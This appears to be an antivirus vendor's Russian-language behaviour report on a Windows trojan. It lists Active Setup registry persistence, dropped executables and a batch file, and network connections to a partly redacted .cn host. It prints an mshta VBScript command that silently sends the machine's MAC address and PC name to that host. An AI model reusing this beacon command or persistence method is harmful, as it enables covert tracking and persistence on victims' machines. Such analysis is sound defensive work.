Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Microsoft\Active Setup\Installed Components\{AENGFU3AA-B170-11d2-9CBD-0000F87A369E}] 'stubpath' = ''
Вредоносные функции:
Создает и запускает на исполнение:
- %PROGRAM_FILES%\Docmentt\dvrss.exe
- %WINDIR%\46.exe
Запускает на исполнение:
- <SYSTEM32>\tasklist.exe /nh
- <SYSTEM32>\mshta.exe vbscript:CreateObject("WScript.Shell").Run("iexplore http://un###26.cn:8009/count.asp?ma## 00:00:00:00:00:01&pcname=113&userid=001",0)(window.close)
- %PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE http://un###26.cn:8009/count.asp?ma## 00:00:00:00:00:01&pcname=113&userid=001
- <SYSTEM32>\cmd.exe /c %WINDIR%\46.bat
- <SYSTEM32>\ipconfig.exe /all
- <SYSTEM32>\findstr.exe /c:"Physical Address"
Изменения в файловой системе:
Создает следующие файлы:
- %WINDIR%\46.bat
- <Текущая директория>\1.txt
- %PROGRAM_FILES%\Docmentt\dvrss.exe
- %WINDIR%\46.exe
- C:\SaveTxta170.txt
Удаляет следующие файлы:
- <Текущая директория>\1.txt
- %WINDIR%\46.exe
- C:\SaveTxta170.txt
Сетевая активность:
Подключается к:
- 'un##126.cn':8009
- 'localhost':1037
UDP:
- DNS ASK un##126.cn
Другое:
Ищет следующие окна:
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
